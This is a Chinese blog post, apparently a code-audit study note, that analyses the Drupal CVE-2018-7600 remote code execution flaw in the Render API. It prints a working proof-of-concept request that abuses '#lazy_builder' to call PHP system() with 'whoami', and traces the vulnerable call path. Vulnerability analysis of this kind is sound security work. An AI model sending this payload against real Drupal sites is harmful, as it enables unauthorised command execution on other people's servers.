代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API

  今天学习一下Drupal的另一个漏洞,由于渲染数组不当造成的漏洞

  poc:

url:
http://localhost/drupal-8.5.0/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

post:
'mail[a][#lazy_builder][0]': 'system',
'mail[a][#lazy_builder][1][]': 'whoami',
'form_id': 'user_register_form'

  使用poc进行测试,并在断点处观察其调用流程:

  函数的漏洞入口点在:

  \core\modules\file\src\Element\ManagedFile.php处

  代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API

  经过explode函数处理,将get请求中的element_parents参数的值变成一个数组:即比如a/b/c变成了["a","b","c"]

  然后将处理完的$form_parents变量传给NestedArray类的getValue函数处理,其中$form包含了表单的所有信息,我们跟进一下:

  其中getValue函数就是将$form中的值逐层取出,

  代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API

  如果$parents为a/b/c,则结果值为123

  代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API

     此时$callable变量为system,$args变量为["whoami"],然后再调用call_user_func_array()函数处理

  代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API

 

相关文章:

  • 2021-06-04
  • 2019-03-07
  • 2021-06-08
  • 2021-07-15
  • 2020-06-19
  • 2022-12-23
  • 2022-01-22
  • 2022-01-19
猜你喜欢
  • 2021-05-11
  • 2022-12-23
  • 2020-04-18
  • 2021-09-19
  • 2021-07-24
  • 2021-09-10
  • 2021-10-17
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode